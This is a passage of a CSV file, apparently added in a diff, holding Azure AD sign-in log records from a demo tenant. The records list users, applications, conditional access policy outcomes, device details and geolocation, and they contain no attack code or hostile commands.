0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 12:46,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",11779f6a-e330-484b-9e89-76d92b9a1400,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,11779f6a-e330-484b-9e89-76d92b9a1400,SigninLogs,Sucess,50.6406517,5.572050095
+1446,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:16.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,eb8f781f-c56e-42db-aeba-fdc20eacd4b1,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 12:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",d6103972-d51f-4bff-802b-f4401a4e1200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,d6103972-d51f-4bff-802b-f4401a4e1200,SigninLogs,Sucess,36.6404686,-78.26995087
+1447,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,52:39.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,deccc428-3fda-4bc3-ba19-f0967fea0563,Microsoft.aadiam,Microsoft.aadiam,,Chris Boehm,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 12:52,"{'operatingSystem': 'Windows 10', 'deviceId': 'd6dd34c4-e1a4-4486-bd7b-115b5de752fb', 'browser': 'Edge 18.1836', 'displayName': 'CALMENTROPY', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",5b60c050-896d-4564-97ff-232768146900,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],{'errorCode': 0},Chris Boehm,8c102503-0f98-4b9b-9b4a-ebb56d14c66a,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,5b60c050-896d-4564-97ff-232768146900,SigninLogs,Sucess,35.01296997,-80.93171692
+1448,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,27:47.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0fc6979c-8ba8-485f-926e-5902dd8af924,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Office Web Apps Service,67e3df25-268a-4324-a550-0de1c7f97287,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}]",notApplied,09/04/2020 13:27,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",5fa972fe-7fa8-4b4b-bbdd-e6021f821400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,5fa972fe-7fa8-4b4b-bbdd-e6021f821400,SigninLogs,Sucess,33.7984581,-84.38828278
+1449,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,52:39.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,deccc428-3fda-4bc3-ba19-f0967fea0563,Microsoft.aadiam,Microsoft.aadiam,,Chris Boehm,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 12:52,"{'operatingSystem': 'Windows 10', 'deviceId': 'd6dd34c4-e1a4-4486-bd7b-115b5de752fb', 'browser': 'Edge 18.1836', 'displayName': 'CALMENTROPY', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",5b60c050-896d-4564-97ff-232768146900,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],{'errorCode': 0},Chris Boehm,8c102503-0f98-4b9b-9b4a-ebb56d14c66a,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,5b60c050-896d-4564-97ff-232768146900,SigninLogs,Sucess,35.01296997,-80.93171692
+1450,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:59.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,68da4326-b952-443e-b854-dd1181e7b771,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 20:50,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",5511ead1-bd0f-42e2-a2c1-d74a10d30000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,5511ead1-bd0f-42e2-a2c1-d74a10d30000,SigninLogs,Sucess,36.6404686,-78.26995087
+1451,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,09:06.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,d9e52723-6216-4023-a006-31565b7b7d3c,Microsoft.aadiam,Microsoft.aadiam,,CBServiceAccount,4,US,Azure Active Directory PowerShell,1b730954-1685-4b74-9bfd-dac224a7b894,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:09,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Rich Client 3.19.7.16602'}",8a945db4-b61d-4e46-b881-75d8d71b1300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.17196655273438, 'latitude': 38.73078155517578}, 'state': 'Virginia', 'city': 'Washington'}",none,none,none,none,[],{'errorCode': 0},CBServiceAccount,ba008280-608e-4a2d-b693-19957e50c691,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,8a945db4-b61d-4e46-b881-75d8d71b1300,SigninLogs,Sucess,38.73078156,-78.17196655
+1452,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,27:28.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c914479f-2068-0000-5683-40e6c2996640,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 13:27,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",4aca3199-2681-43b9-9160-589c11f51200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,4aca3199-2681-43b9-9160-589c11f51200,SigninLogs,Sucess,33.7984581,-84.38828278
+1453,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:52.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,deccc428-3fda-4bc3-ba19-f0967fea0563,Microsoft.aadiam,Microsoft.aadiam,,Chris Boehm,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 